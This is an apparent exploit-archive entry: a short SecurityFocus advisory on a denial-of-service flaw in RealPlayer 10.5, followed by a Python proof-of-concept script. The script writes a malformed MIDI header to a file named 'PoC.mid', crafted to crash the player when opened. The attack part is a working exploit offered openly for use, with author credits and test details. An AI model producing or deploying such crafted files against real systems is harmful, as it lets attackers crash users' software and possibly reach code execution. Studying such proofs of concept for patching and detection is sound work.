19 lines
No EOL
977 B
Python
Executable file
19 lines
No EOL
977 B
Python
Executable file
source: https://www.securityfocus.com/bid/22050/info
|
|
|
|
RealNetwork RealPlayer is prone to a remote denial-of-service vulnerability because the application fails to handle specially crafted files.
|
|
|
|
Exploiting this issue allows remote attackers to crash the application, denying further service to legitimate users. Arbitrary code execution might be possible, but this is not confirmed.
|
|
|
|
Version 10.5 is vulnerable to this issue; other versions may also be affected.
|
|
|
|
print "-----------------------------------------------------------------------"
|
|
print "# RealPlayer 10.5 .mid file Denial of Service"
|
|
print "# author: shinnai"
|
|
print "# mail: shinnai[at]autistici[dot]org"
|
|
print "# site: http://shinnai.altervista.org"
|
|
print "# Tested on Windows XP Professional SP2 all patched"
|
|
print "-----------------------------------------------------------------------"
|
|
|
|
fileOut = open('PoC.mid','wb')
|
|
fileOut.write('\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00')
|
|
fileOut.close() |